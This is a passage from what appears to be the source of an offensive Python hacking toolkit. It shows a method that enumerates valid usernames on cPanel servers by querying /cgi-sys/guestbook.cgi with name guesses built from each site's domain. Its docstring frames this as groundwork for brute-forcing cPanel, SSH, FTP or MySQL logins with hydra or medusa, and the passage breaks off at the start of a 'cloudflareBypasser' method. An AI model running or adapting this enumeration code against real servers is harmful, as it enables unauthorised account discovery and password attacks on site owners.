get server users using a method found by iranian hackers , the attacker may do a bruteforce attack on CPanel, ssh, ftp or even mysql if it supports remote login (you can use medusa or hydra)
(self)
| 1227 | pass |
| 1228 | |
| 1229 | def getUsers(self): |
| 1230 | """ |
| 1231 | get server users using a method found by |
| 1232 | iranian hackers , the attacker may |
| 1233 | do a bruteforce attack on CPanel, ssh, ftp or |
| 1234 | even mysql if it supports remote login |
| 1235 | (you can use medusa or hydra) |
| 1236 | """ |
| 1237 | clearScr() |
| 1238 | print "[~] Grabbing Users" |
| 1239 | userslist = [] |
| 1240 | for site1 in self.sites: |
| 1241 | try: |
| 1242 | site = site1 |
| 1243 | site = site.replace('http://www.', '') |
| 1244 | site = site.replace('http://', '') |
| 1245 | site = site.replace('.', '') |
| 1246 | if '-' in site: |
| 1247 | site = site.replace('-', '') |
| 1248 | site = site.replace('/', '') |
| 1249 | while len(site) > 2: |
| 1250 | resp = urllib2.urlopen( |
| 1251 | site1 + '/cgi-sys/guestbook.cgi?user=%s' % site).read() |
| 1252 | if 'invalid username' not in resp.lower(): |
| 1253 | print '\t [*] Found -> ', site |
| 1254 | userslist.append(site) |
| 1255 | break |
| 1256 | else: |
| 1257 | print site |
| 1258 | |
| 1259 | site = site[:-1] |
| 1260 | except: |
| 1261 | pass |
| 1262 | |
| 1263 | clearScr() |
| 1264 | for user in userslist: |
| 1265 | print user |
| 1266 | |
| 1267 | def cloudflareBypasser(self): |
| 1268 | """ |